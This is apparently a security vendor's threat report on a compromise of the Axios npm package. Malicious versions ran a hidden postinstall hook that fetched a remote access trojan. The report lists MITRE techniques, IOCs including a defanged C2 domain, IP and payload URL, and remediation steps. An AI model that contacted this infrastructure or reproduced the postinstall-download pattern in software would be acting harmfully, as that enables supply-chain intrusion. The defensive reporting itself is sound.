A supply chain compromise delivered malicious versions of the Axios npm package that executed a hidden postinstall dependency to download and deploy a remote access trojan on developer and CI/CD systems. LevelBlue detected abnormal npm/node-spawned command interpreters, outbound C2 traffic to sfrclak[.]com (142.11.206[.]73), and provided containment, remediation, and hunting guidance. #Axios #sfrclak.com
Keypoints
- Malicious versions of the Axios npm package ([email protected] and [email protected]) were published after compromise of a developer’s npm account, introducing a hidden dependency that ran during installation.
- The hidden dependency executed automatically via an npm postinstall script, which downloaded and executed a secondary payload that deployed a remote access trojan (RAT).
- Multiple systems showed abnormal parent-child process chains where npm/node spawned cmd.exe and powershell.exe followed by network utilities (curl/wget), indicating automated post-install command execution.
- LevelBlue’s Cybereason EDR generated detections for post-install script execution, renamed PowerShell spawning, and suspicious outbound network communications tied to C2 infrastructure.
- Observed IOCs include SHA256 hashes for payloads, malicious filenames (package/setup.js, 6202033.ps1), a C2 domain (sfrclak[.]com), and a C2 IP (142.11.206[.]73) with a payload URL.
- Recommended actions include isolating affected systems, reimaging hosts, rotating exposed credentials and npm credentials, disabling npm scripts where feasible, enforcing dependency pinning and integrity checks, and auditing CI/CD pipelines.
MITRE Techniques
- [T1195 ] Supply Chain Compromise – Initial access achieved by publishing malicious versions of a trusted package to npm after compromising a developer account; ‘threat actors successfully published malicious versions of the package to the npm repository after compromising the npm account of the company’s lead developer.’
- [T1105 ] Ingress Tool Transfer – Secondary payloads and tooling were downloaded from external infrastructure during postinstall execution; ‘This resulted in the downloading and execution of a secondary payload.’
- [T1059.001 ] Command and Scripting Interpreter: Windows Command Shell – npm/node spawned cmd.exe to run commands initiated by the malicious install script; ‘npm or node spawned command interpreters such as cmd.exe, powershell.exe, followed by execution of network utilities like curl or wget.’
- [T1059.003 ] Command and Scripting Interpreter: PowerShell – Malicious PowerShell scripts (6202033.ps1) were observed and spawned by npm/node during exploitation; ‘Command line contains ‘6202033.ps1’ OR ’6202033.vbs’’ and detections for renamed PowerShell spawning were recorded.
- [T1055 ] Process Injection or In-memory Execution – The attack included possible in-memory execution of components to avoid disk artifacts; ‘Potential in-memory execution of malware components.’
- [T1071 ] Application Layer Protocol – Outbound C2 communications and payload retrieval used HTTP(s) to attacker-controlled domains and endpoints; ‘Establishment of outbound connections to attacker-controlled domains’ and reference to ‘http[:]//sfrclak[.]com[:]8000/6202033.’
Indicators of Compromise
- [Sha256 ] Post-install and payload file hashes – e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09 (package/setup.js), 617b67a8e1210e4fc87c92d1d1da45a2f311c08d26e89b12307cf583c900d101 (6202033.ps1)
- [IP ] Command-and-control server – 142.11.206[.]73 (C2 IP address observed communicating with infected hosts)
- [Domain ] Command-and-control domain – sfrclak[.]com (C2 domain used for payload hosting and control)
- [URL ] C2 / payload URL – http[:]//sfrclak[.]com[:]8000/6202033 (URL used to deliver secondary payload)
- [File name ] Malicious files observed on disk – package/setup.js, 6202033.ps1 (files tied to postinstall execution and payload delivery)
- [Package version ] Compromised npm package versions – [email protected], [email protected] (malicious package versions published to npm)